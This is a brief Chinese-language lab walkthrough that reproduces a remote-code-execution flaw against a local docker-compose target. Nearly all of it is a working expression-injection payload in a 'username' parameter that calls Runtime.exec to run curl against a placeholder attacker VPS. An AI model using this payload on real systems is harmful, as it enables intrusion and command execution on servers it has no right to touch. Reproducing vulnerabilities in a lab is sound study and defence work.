** 一、启动靶机 ** docker-compose up -d ** 二、复现 ** URL:http://192.168.150.143:8080/users ** 三、发送Payload ** payload: username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://vps主机_IP/Hacker")]= ** 四、验证 **